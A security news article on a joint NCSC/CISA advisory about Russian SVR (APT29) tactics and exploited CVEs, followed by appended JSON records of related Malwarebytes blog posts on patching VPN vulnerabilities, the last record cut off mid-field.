[](<https://thehackernews.com/images/-W51kRhVBeW0/YJaCznsmgiI/AAAAAAAACfU/z7fgy604zAcZllL9m6sPApy3bUHHX9YEQCLcBGAsYHQ/s0/hacker.jpg>)
Cyber operatives affiliated with the Russian Foreign Intelligence Service (SVR) have switched up their tactics in response to previous [public disclosures](<https://thehackernews.com/2021/04/fbi-cisa-uncover-tactics-employed-by.html>) of their attack methods, according to a [new advisory](<https://us-cert.cisa.gov/ncas/current-activity/2021/05/07/joint-ncsc-cisa-fbi-nsa-cybersecurity-advisory-russian-svr>) jointly published by intelligence agencies from the U.K. and U.S. Friday.
"SVR cyber operators appear to have reacted [...] by changing their TTPs in an attempt to avoid further detection and remediation efforts by network defenders," the National Cyber Security Centre (NCSC) [said](<https://www.ncsc.gov.uk/news/joint-advisory-further-ttps-associated-with-svr-cyber-actors>).
These include the deployment of an open-source tool called [Sliver](<https://github.com/BishopFox/sliver>) to maintain their access to compromised victims as well as leveraging the ProxyLogon flaws in Microsoft Exchange servers to conduct post-exploitation activities.
The development follows the [public attribution](<https://thehackernews.com/2021/04/us-sanctions-russia-and-expels-10.html>) of SVR-linked actors to the [SolarWinds](<https://thehackernews.com/2021/04/researchers-find-additional.html>) supply-chain attack last month. The adversary is also tracked under different monikers, such as Advanced Persistent Threat 29 (APT29), the Dukes, CozyBear, and Yttrium.
The attribution was also accompanied by a technical report detailing five vulnerabilities that the SVR's APT29 group was using as initial access points to infiltrate U.S. and foreign entities.
* [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) \- Fortinet FortiGate VPN
* [**CVE-2019-9670**](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>) \- Synacor Zimbra Collaboration Suite
* [**CVE-2019-11510**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) \- Pulse Secure Pulse Connect Secure VPN
* [**CVE-2019-19781**](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) \- Citrix Application Delivery Controller and Gateway
* [**CVE-2020-4006**](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>) \- VMware Workspace ONE Access
"The SVR targets organisations that align with Russian foreign intelligence interests, including governmental, think-tank, policy and energy targets, as well as more time bound targeting, for example [COVID-19 vaccine](<https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development>) targeting in 2020," the NCSC said.
This was followed by a separate guidance on April 26 that [shed more light](<https://thehackernews.com/2021/04/fbi-cisa-uncover-tactics-employed-by.html>) on the techniques used by the group to orchestrate intrusions, counting password spraying, exploiting zero-day flaws against virtual private network appliances (e.g., CVE-2019-19781) to obtain network access, and deploying a Golang malware called WELLMESS to plunder intellectual property from multiple organizations involved in COVID-19 vaccine development.
Now according to the NCSC, seven more vulnerabilities have been added into the mix, while noting that APT29 is likely to "rapidly" weaponize recently released public vulnerabilities that could enable initial access to their targets.
* [**CVE-2019-1653**](<https://nvd.nist.gov/vuln/detail/CVE-2019-1653>) \- Cisco Small Business RV320 and RV325 Routers
* [**CVE-2019-2725**](<https://nvd.nist.gov/vuln/detail/CVE-2019-2725>) \- Oracle WebLogic Server
* [**CVE-2019-7609**](<https://nvd.nist.gov/vuln/detail/CVE-2019-7609>) \- Kibana
* [**CVE-2020-5902**](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) \- F5 Big-IP
* [**CVE-2020-14882**](<https://nvd.nist.gov/vuln/detail/CVE-2020-14882>) \- Oracle WebLogic Server
* [**CVE-2021-21972**](<https://nvd.nist.gov/vuln/detail/CVE-2021-21972>) \- VMware vSphere
* [**CVE-2021-26855**](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>) \- Microsoft Exchange Server
"Network defenders should ensure that security patches are applied promptly following CVE announcements for products they manage," the agency said.
Found this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter __](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.
{"malwarebytes": [{"lastseen": "2021-04-16T16:30:59", "description": "The National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI) have jointly released a Cybersecurity Advisory called [Russian SVR Targets U.S. and Allied Networks](<https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF>), to expose ongoing Russian Foreign Intelligence Service (SVR) exploitation of five publicly known vulnerabilities. The advisories' executive summary reads:\n\n> Russian Foreign Intelligence Service (SVR) actors, who are also known under the names APT29, Cozy Bear, and The Dukes frequently use publicly known vulnerabilities to conduct widespread scanning and exploitation against vulnerable systems in an effort to obtain authentication credentials and use those to gain further access. This targeting and exploitation encompasses US and allied networks, including national security and government related systems.\n\n### Remarkable mentions in the cybersecurity advisory\n\nReleased alongside the advisory is the US Government\u2019s formal attribution of the [SolarWinds](<https://blog.malwarebytes.com/threat-analysis/2020/12/advanced-cyber-attack-hits-private-and-public-sector-via-supply-chain-software-update/>) supply chain compromise, and the cyber espionage campaign related to it, to Russia.\n\nMentioned are recent SVR activities that include targeting COVID-19 research facilities via [WellMess malware](<https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198c>) and targeting networks through a VMware vulnerability disclosed by NSA.\n\n### Vulnerabilities\n\nNSA, CISA, and the FBI are encouraging organizations to check their networks for Indicators of Compromise (IOCs) related to five vulnerabilities.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services).\n\nThe advisory lists the following CVEs:\n\n * [CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>) as discussed here: [Fortinet FortiGate VPN](<https://www.fortiguard.com/psirt/FG-IR-18-384>)\n * [CVE-2019-9670](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9670>) as discussed here: [Synacor Zimbra Collaboration Suite](<https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories>)\n * [CVE-2019-11510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510>) as discussed here: [Pulse Secure Pulse Connect Secure VPN](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>)\n * [CVE-2019-19781](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19781>) as discussed here: [Citrix Application Delivery Controller and Gateway](<https://support.citrix.com/article/CTX267027>)\n * [CVE-2020-4006](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4006>) as discussed here: [VMware Workspace ONE Access](<https://www.vmware.com/security/advisories/VMSA-2020-0027.html>)\n\nWe have added a link to the vendor\u2019s sites where they discuss the vulnerabilities and where you can find how to patch them. As you can see most of those are quite old (the first four digits in a CVE ID are the year in which the CVE was issued) and patches have been available for a considerable time.\n\n### General mitigation strategy\n\nWhile some vulnerabilities have specific additional mitigations that you can read about in the items linked in the list above, the advisory hands us the following general mitigations:\n\n * Keep systems and products updated and patch as soon as possible after patches are released since many actors exploit numerous vulnerabilities.\n * Expect that the risk from data stolen or modified (including credentials, accounts, and software) before a device was patched will not be alleviated by patching or simple remediation actions. Assume that a breach will happen, enforce least-privileged access, and make password changes and account reviews a regular practice.\n * Disable external management capabilities and set up an out-of-band management network.\n * Block obsolete or unused protocols at the network edge and disable them in device configurations.\n * Isolate Internet-facing services in a network Demilitarized Zone (DMZ) to reduce exposure of the internal network.\n * Enable robust logging of Internet-facing services and authentication functions. Continuously hunt for signs of compromise or credential misuse, particularly within cloud environments.\n * Adopt a mindset that compromise happens; prepare for incident response activities, only communicate about breaches on out-of-band channels, and take care to uncover a breach\u2019s full scope before remediating.\n\n### Techniques\n\nThe techniques leveraged by SVR actors include:\n\n * **Exploiting public-facing applications**. Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior.\n * **Leveraging external remote services**. Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms (notably RPD) allow users to connect to internal enterprise network resources from external locations.\n * **Compromising supply chains**. Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.\n * **Using valid accounts**. Adversaries may obtain and abuse credentials of existing accounts as a means of gaining access or elevating permissions.\n * **Exploiting software for credential access**. Adversaries may exploit software vulnerabilities in an attempt to collect credentials.\n * **Forging web credentials**: SAML tokens. An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.\n\nThe items listed under mitigations and techniques probably won't be new to many of the people reading this, but they are a reminder that security, even against nation-state actors, is often a matter of getting some important but mundane things right, over and over again.\n\nStay safe, everyone!\n\nThe post [Patch now! NSA, CISA, and FBI warn of Russian intelligence exploiting 5 vulnerabilities](<https://blog.malwarebytes.com/malwarebytes-news/2021/04/patch-now-nsa-cisa-and-fbi-warn-of-russian-intelligence-exploiting-5-vulnerabilities/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-04-16T14:59:38", "type": "malwarebytes", "title": "Patch now! NSA, CISA, and FBI warn of Russian intelligence exploiting 5 vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "modified": "2021-04-16T14:59:38", "id": "MALWAREBYTES:80B21E934B1C43C7071F039FE9512208", "href": "https://blog.malwarebytes.com/malwarebytes-news/2021/04/patch-now-nsa-cisa-and-fbi-warn-of-russian-intelligence-exploiting-5-vulnerabilities/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-06-21T14:31:54", "description": "Remember when we told you to patch your VPNs already? I hate to say "I told you so", but I informed you thusly.\n\nAccording to South Korean officials a North Korean cyber-espionage group managed to infiltrate the network of South Korea's state-run nuclear research institute last month.\n\n### The crime: time and place\n\nCybersecurity news hounds The Record report that a spokesperson for the Korea Atomic Energy Research Institute (KAERI) said [the intrusion took place last month](<https://therecord.media/north-korean-hackers-breach-south-koreas-atomic-research-agency-through-vpn-bug/>), on May 14 to be exact, through a vulnerability in a virtual private network (VPN) server. Since its establishment in 1959, KAERI has been the only research institute in Korea dedicated to nuclear energy. Reportedly, thirteen unauthorized IP addresses accessed KAERI\u2019s internal network.\n\n### The suspect: Kimsuky\n\nSome of the addresses could be traced back to the APT group called Kimsuky. One of the IP addresses was used in an attack that targeted COVID-19 vaccine developers in South Korea last year.\n\nNorth Korean cyber-attacks on its southern neighbor are not uncommon. And Kimsuky is the APT that is best known for these attacks. The Kimsuky APT is a North Korean threat actor that has been active since 2012 and targets government entities mainly in South Korea. Recently, we reported about [this group using the AppleSeed backdoor](<https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/>) against the Ministry of Foreign Affairs of South Korea.\n\n### The victim: KAERI\n\nKAERI is a national research institute which was instrumental in developing nuclear technology for power generation and industrial applications. And while North Korea is ahead of South Korea in some nuclear fields\u2014notably nuclear weapons\u2014it is thought to be weaker than its neighbor when it comes to energy generation. As we stated in our earlier [report](<https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/>) one of the other targets was the nuclear security officer for the International Atomic Energy Agency (IAEA), a UN organization tasked with nuclear regulations and cooperation.\n\n### The weapon: a VPN vulnerability\n\nIn a [statement](<https://translate.google.com/translate?sl=auto&tl=en&u=https://www.kaeri.re.kr/board/view?menuId%3DMENU00326%26linkId%3D9181>), KAERI says that an unidentified outsider accessed parts of its system using weaknesses in its virtual private network (VPN). It also states that the attackers' IP addresses was blocked, and its system upgraded, when it found out about the attack, on May 31. \n\nThe name of the VPN vendor is being kept secret. Although we can't rule out a zero-day, that fact that this wasn't mentioned, and that the system was updated in response, suggests it wasn't. It certainly doesn't need to be, and there are a lot of known vulnerabilities in the running. Many of them are years old, and many are known to be used in the wild. Even though patches are available, the application of these patches has taken some organizations quite some time. \n\nWe also wrote recently about vulnerabilities in the [Pulse Secure VPN](<https://blog.malwarebytes.com/malwarebytes-news/2021/04/take-action-multiple-pulse-secure-vpn-vulnerabilities-exploited-in-the-wild/>). Pulse issued a final patch on May 3 for a set of vulnerabilities that were used in the wild.\n\nThe NSA also issued an [advisory](<https://www.nsa.gov/News-Features/Feature-Stories/Article-View/Article/2573391/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabili/>) in April about five publicly known vulnerabilities being exploited by the Russian Foreign Intelligence Service (SVR). The CVE numbers used to identify vulnerabilities start with year the CVE was issued. What's most striking about the NSA's list is just how old most of the vulnerabilities on it are.\n\n * [CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>) Fortinet FortiGate VPN\n * [CVE-2019-9670](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9670>) Synacor Zimbra Collaboration Suite\n * [CVE-2019-11510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510>) Pulse Secure Pulse Connect Secure VPN\n * [CVE-2019-19781](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19781>) Citrix Application Delivery Controller and Gateway\n * [CVE-2020-4006](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4006>) VMware Workspace ONE Access\n\nAs you can see, most of them are VPNs and other networking-related applications. By design a VPN is remotely accessible, which makes it a target that attackers can reach from anywhere. A VPN or gateway is always a likely target, especially if it has a known vulnerability. And a seasoned APT group, like Kimsuky, will have fewer problems reverse-engineering patches than your everyday cybercriminal.\n\n### Patching or lack thereof\n\nThe risky strategy of little-to-no-patching stands a good chance of going horribly wrong. A [Forbes study](<https://www.forbes.com/sites/taylorarmerding/2019/06/06/report-if-you-dont-patch-you-will-pay>) of 340 security professionals in 2019 found 27% of organizations worldwide, and 34% in Europe, said they\u2019d experienced breaches due to unpatched vulnerabilities. If an inability to patch promptly is compounded by delays in detecting new systems added to networks, and a lack of regular vulnerability scanning, attackers are left with a lot of room to work with.\n\nStay safe, everyone!\n\nThe post [Atomic research institute breached via VPN vulnerability](<https://blog.malwarebytes.com/reports/2021/06/atomic-research-institute-breached-via-vpn-vulnerability/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-06-21T13:53:03", "type": "malwarebytes", "title": "Atomic research institute breached via VPN vulnerability", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "modified": "2021-06-21T13:53:03", "id": "MALWAREBYTES:BAB94968DD1EC37DA6F977226977DAF5", "href": "https://blog.malwarebytes.com/reports/2021/06/atomic-research-institute-breached-via-vpn-vulnerability/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-11-04T22:43:41", "description": "The Cybersecurity and Infrastructure Security Agency (CISA) has issued binding directive 22-01 titled [Reducing the Significant Risk of Known Exploited Vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities>). This directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third-parties on an agency\u2019s behalf.\n\nOne of the most welcomed of the required actions set forth in the directive is that CISA will keep a [catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) of vulnerabilities alongside timeframes in which they must be remediated. According to the plan, this catalog will list only the most important vulnerabilities that have proven to pose the biggest risks.\n\n### The scope\n\nIn the US, a binding operational directive is an instruction that federal, executive branch, departments and agencies have to follow. They also provide a strong indication of the kind of cybersecurity measures that CISA thinks are important, which other organizations may wish to follow. (It's also easy to imagine that what's required of federal agencies today may be required of the vast web of suppliers to federal agencies tomorrow.)\n\nTo that end, CISA strongly recommends that private businesses and state, local, tribal, and territorial (SLTT) governments review and monitor its catalog. CISA has done the hard work of identifying what should be patched first, and anyone who follows its guidance is likely to find their security and resilience posture improved.\n\n### The reason\n\nIt will come as no surprise that the continued cyberattacks against US entities are the reason for this directive: "The United States faces persistent and increasingly sophisticated malicious cyber campaigns that threaten the public sector, the private sector, and ultimately the American people\u2019s security and privacy.\u201d\n\nMany of the attacks against US organizations rely on vulnerabilities that could have been patched months or even years ago, but haven't been. For example, earlier this year CISA issued a joint advisory with the FBI and NSA urging US organizations to patch [five old vulnerabilities](<https://blog.malwarebytes.com/malwarebytes-news/2021/04/patch-now-nsa-cisa-and-fbi-warn-of-russian-intelligence-exploiting-5-vulnerabilities/>) from 2018 and 2019 that were regularly exploited by the Russian Foreign Intelligence Service.\n\nThe idea is that better patch management, supported by the prioritization provided by the CISA catalog, can prevent future attacks.\n\n### The rules\n\nThe required actions are pretty simple and straightforward\u2014to read at least. Execution of the rules may prove to be more difficult. The rules are:\n\n * **Plan**. Organizations have 60 days to come up with a vulnerability management plan.\n * **Execute**. CISA is giving notice that the clock is running on vulnerabilities it cares about. The affected departments and agencies have six months to fix anything with a CVE issued before 2021, and two weeks to fix everything else.\n * **Report**. Organizations have to report on the status of vulnerabilities through the Continuous Diagnostics and Mitigation (CDM) Federal Dashboard.\n\nWhile 6 months may seem a long time for the CVE\u2019s prior to 2021, that doesn\u2019t mean they are less important than this year's vulnerabilities. The grace period may reflect the difficulty that organizations have already had in fixing older bugs, or the fact that "everything prior to 2021" is just a much longer period of time than the ten months of 2021. After six months is up and all those vulnerabilities are fixed, presumably everyone will be on a much shorter lease, with just two weeks to fix anything CISA deems serious enough to put on its list.\n\nIn some cases the catalog already lists a vulnerability with a due date in the past, such as [CVE-2019-11510](<https://blog.malwarebytes.com/business-2/2019/10/pulse-vpn-patched-their-vulnerability-but-businesses-are-trailing-behind/>). In August, 2019, scans performed by Bad Packets found a total of 14,528 Pulse Secure VPN endpoints vulnerable to CVE-2019-11510, four months after a patch became avaiable. Over 5,000 of those were in the US, including military, federal, state, and local government agencies\u2014and this was after advisories have been issued by the NSA and the NCSC.\n\nThe notes column for this CVE references [CISA's ED 21-03](<https://cyber.dhs.gov/ed/21-03/>) for further guidance and requirements. In that Emergency Directive you will find the due date of April 23rd of 2021. So, it was already required to be patched for organizations that are bound to follow emergency directives.\n\n### Patch management\n\nBecause patch management has proven to be a challenge, having a catalog to fall back on when you are looking for prioritization rules can be very helpful. On the other hand, by telling organizations what needs to be done, inadvertently they may skip necessary patches, simply because they were not listed. Or worse, they were listed but the people responsible for patching didn\u2019t find them.\n\nEither way, if this is a first step in setting up a compliance program, where all the vulnerabilities that are used in the wild get patched within two weeks we will certainly welcome it. We have seen the impact of, for example, the [disclosure rules](<https://googleprojectzero.blogspot.com/2021/04/policy-and-disclosure-2021-edition.html>) set forth by Google\u2019s Project Zero on the generally accepted rules for [responsible](<https://en.wikipedia.org/wiki/Responsible_disclosure>)[ disclosure](<https://en.wikipedia.org/wiki/Responsible_disclosure>), and would love to see this directive have a similar effect on the average patching speed.\n\nStay safe, everyone!\n\nThe post [CISA sets two week window for patching serious vulnerabilities](<https://blog.malwarebytes.com/reports/2021/11/cisa-sets-two-week-window-for-patching-serious-vulnerabilities/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-04T21:23:02", "type": "malwarebytes", "title": "CISA sets two week window for patching serious vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2021-11-04T21:23:02", "id": "MALWAREBYTES:6ECB9DE9A2D8D714DB50F19BAF7BF3D4", "href": "https://blog.malwarebytes.com/reports/2021/11/cisa-sets-two-week-window-for-patching-serious-vulnerabilities/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-10-18T17:31:38", "description": "In April 2019, Pulse Secure published an advisory about a vulnerability in their software. In August, cybercriminals were massively scanning for systems that were running a vulnerable version. Now it\u2019s October, and still many organizations have not applied the patches that are available for this vulnerability. \n\nThis is a trend we've seen repeated with dozens of other publicly-known vulnerabilities and organizations that are slow to update software to the latest, most secure versions. \n\nWith so many organizations falling victim to cyberattack via exploited vulnerability, we have to ask: Why aren't people patching?\n\n### What are the vulnerabilities?\n\nReading the above, you might suspect that the vulnerabilities were not serious or hard to exploit. But that's not the impression we get from the Pulse Secure advisory. It states:\n\n> \u201cMultiple vulnerabilities were discovered and have been resolved in Pulse Connect Secure (PCS) and Pulse Policy Secure (PPS). This includes an authentication by-pass vulnerability that can allow an unauthenticated user to perform a remote arbitrary file access on the Pulse Connect Secure gateway. This advisory also includes a remote code execution vulnerability that can allow an authenticated administrator to perform remote code execution on Pulse Connect Secure and Pulse Policy Secure gateways.\u201d\n\nPulse Connect Secure is a VPN solution for organizations and offers remote users a secure connection to the corporate network so they can remotely log in and work. Pulse Policy Secure is a well-known Network Access Control solution, which does not only control who can connect but also assigns the appropriate permissions.\n\nWhen it comes to software like this, an authentication by-pass vulnerability is a serious problem. Any criminal with the proper knowledge can pretend to be an employee and access company resources. In this case, https access and the use of an especially-prepared URL would be enough to read an arbitrary file on a vulnerable system.\n\nNeedless to say, that is a serious problem\u2014and we haven\u2019t even touched on the remote code execution possibility. Every hacker's dream is to be able to run their code on your system. That gives them a foothold within your network from which they can expand their activities. They can plant ransomware or whatever else they fancy.\n\n### Where would they get the necessary knowledge\n\nBy design, many cybercriminals are opportunistic, and they will jump at any easy copy-and-paste job that renders enough cash. So, when the vulnerability was discussed elaborately at Black Hat in early August, the method to exploit the vulnerability became general knowledge. \n\nSince using this method hardly requires expert knowledge, researchers soon noticed a lot of scanning activity by cybercriminals looking for vulnerable systems. The vulnerability in Pulse Secure was presented along with a [few vulnerabilities in other SSL VPN products](<https://www.blackhat.com/us-19/briefings/schedule/#infiltrating-corporate-intranet-like-nsa---pre-auth-rce-on-leading-ssl-vpns-15545>). Shortly after, an exploit for this vulnerability was published on GitHub, so every copycat could have it handy.\n\n### Unpatched\n\nOn Saturday, August 24, 2019, scans performed by [Bad Packets](<https://badpackets.net/over-14500-pulse-secure-vpn-endpoints-vulnerable-to-cve-2019-11510/>) found a total of 14,528 Pulse Secure VPN endpoints vulnerable to CVE-2019-11510. Over 5,000 of those were in the US, including military, federal, state, and local government agencies. \n\nA week later, 10,471 Pulse Secure VPN servers worldwide remained vulnerable to compromise. On Monday, September 16, 2019, there were still 7,712 left to be patched. On Monday, October 7, 2019, a surprising 6,018 remained, with a lot of active scanning going on\u2014and this was after advisories have been issued by the NSA and the NCSC.\n\n### Responsibility\n\nA basic question in cases like these is: Who is responsible for applying patches? Without doubt, we expect a vendor to develop a patch as soon as the vulnerability is made known to them, but what happens after that? \n\nIndustry leaders have long warned that vulnerability remediation and effective patch management are essential to keep organizations safe from cyberattacks. But there are a few essential steps in the delivery chain after the patch is released:\n\n * Customers need to be made aware of the patch and the required urgency.\n * Security providers or resellers need to make sure their customers are aware of the existence of the patch and the possible consequences of not applying it.\n * Organizations need to have a department or external provider that is responsible for keeping the security software updated. Spending money on top-notch software and then leaving it unattended is a sure waste of money. Keeping software in shape is not limited to applying patches, but security patches can sometimes be more important than fetching the latest rules update.\n\nThe natural next question, then, is why aren't organizations applying patches as soon as they know about them? \n\n* * *\n\n_Recommended reading: _[Tackling the shortage in skilled IT staff: whole team security](<https://blog.malwarebytes.com/security-world/business-security-world/2019/02/tackling-the-shortage-in-skilled-it-staff-whole-team-security/>)\n\n* * *\n\n### So, what\u2019s stopping them from applying the patch?\n\nAssuming that an organization's IT or security team is aware of the patch, possible reasons for holding off might be fear of disrupted processes or a possible disagreement on what they might regard as critical. But the possible consequences of an unpatched critical vulnerability should heavily outweigh those concerns. \n\nThere could be several other reasons for not applying patches as soon as they are available:\n\n * Understaffed IT and security teams \n * Looking into the consequences first, which could slow down the process due to lack of feedback\n * Waiting for others to share their experiences before applying patches \n * Unaware of the patch's existence, sometimes as a result of not having time to follow up on emails and warning signs\n * Lack of a point of contact. Whose problem is it? And whose job is to solve it?\n\nAs you can see, most of these can be traced back to a lack of staff and time, and sometimes funding is responsible for those two shortages. But sometimes understaffing is because of [other reasons.](<https://blog.malwarebytes.com/security-world/2018/06/whats-causing-the-cybersecurity-skills-gap/>) And once you are understaffed, the lack of time to follow up on problems comes as a logical consequence.\n\n### The Pulse vulnerability is not alone\n\nIt\u2019s not like the Pulse vulnerability is the only VPN-related vulnerability out there (or any software vulnerability, for that matter). Similar problems are known to exist in products from Fortinet and Palo Alto. \n\nIn an [advisory](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>) from the National Cyber Security Center (NCSC) in the UK, users of the affected VPN products can find specified log entries to look for signs of a compromise or attempt to compromise. They also emphasize the need for patching: \n\n> \u201cSecurity patches should always be applied promptly. More guidance is available on the NCSC website. The NCSC acknowledges that patching is not always straightforward and in some cases can cause business disruption, but it remains the single most important step an organisation or individual can take to protect itself.\u201d\n\nSo, the question remains: If organizations are aware of the patch and have the staff resources to apply it, why are so many dragging their feet? Maybe some of our readers can shed some light on this mystery. Feel free to share your personal experiences in the comments. \n\nThe post [Pulse VPN patched their vulnerability, but businesses are trailing behind](<https://blog.malwarebytes.com/business-2/2019/10/pulse-vpn-patched-their-vulnerability-but-businesses-are-trailing-behind/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2019-10-18T16:36:36", "type": "malwarebytes", "title": "Pulse VPN patched their vulnerability, but businesses are trailing behind", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2019-10-18T16:36:36", "id": "MALWAREBYTES:5B32671B820EEB03840B798BCEA9FDC8", "href": 